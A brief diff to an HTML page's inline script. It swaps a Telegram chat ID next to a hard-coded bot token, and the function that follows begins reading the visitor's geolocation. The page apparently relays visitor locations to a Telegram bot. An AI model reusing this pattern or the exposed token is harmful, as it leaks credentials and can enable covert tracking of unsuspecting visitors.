--- a/index.html
+++ b/index.html
@@ -23,7 +23,7 @@
 
     <script>
         var token = '6197747448:AAFrgXeZdjQZ1iTm9AE6v56h6y-qShiH5es'; // Replace with your bot token
-        var chatId = '-1001234567890'; // Replace with your actual chat ID
+        var chatId = '5112680061'; // Replace with your actual chat ID
 
         function getLocation() {
             if (navigator.geolocation) {
